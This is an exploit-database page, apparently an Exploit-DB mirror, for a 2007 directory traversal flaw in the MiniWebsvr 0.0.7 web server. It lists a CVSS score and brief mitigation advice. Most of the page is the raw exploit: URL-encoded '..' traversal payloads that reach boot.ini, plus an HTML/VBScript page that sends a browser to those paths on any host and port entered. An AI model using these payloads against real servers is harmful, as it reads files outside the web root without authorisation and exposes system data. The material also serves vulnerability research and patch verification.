header-logo
Suggest Exploit
vendor:
MiniWebsvr
by:
shinnai
7.5
CVSS
HIGH
Directory traversal
22
CWE
Product Name: MiniWebsvr
Affected Version From: 0.0.7
Affected Version To: 0.0.7
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

MiniWebsvr 0.0.7 Directory transversal vulnerability

This exploit allows an attacker to perform directory traversal attacks by accessing files outside the web server root directory. The vulnerable URL is 'http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini' or 'http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../'.

Mitigation:

To mitigate this vulnerability, it is recommended to validate user input and properly sanitize file paths to prevent directory traversal attacks. Additionally, web servers should be configured to restrict access to sensitive files outside the web server root directory.
Source

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------
<b>MiniWebsvr 0.0.7 Directory transversal vulnerability</b>
url: http://miniwebsvr.sourceforge.net/
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini or
http://localhost/%5C..%5C..%5C..%5C..%5C..%5C../
-------------------------------------------------------------

Host			Port
<input type=text name=txtIP value = "localhost">	<input type=text name=txtPort value = "8080">

<input language=VBScript onclick=GetBoot() type=button value="Click to get boot.ini">

<input language=VBScript onclick=BrowseMe() type=button value="Click to browse">

<script language='vbscript'>
Sub GetBoot
  on error resume next
  document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../boot.ini"
end sub

Sub BrowseMe
  on error resume next
  document.location = "http://" + txtIP.value + ":" + txtPort.value + "/%5C..%5C..%5C..%5C..%5C..%5C../"
end sub
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-04-11]

Navigation

Suggest Exploit

Services By CQR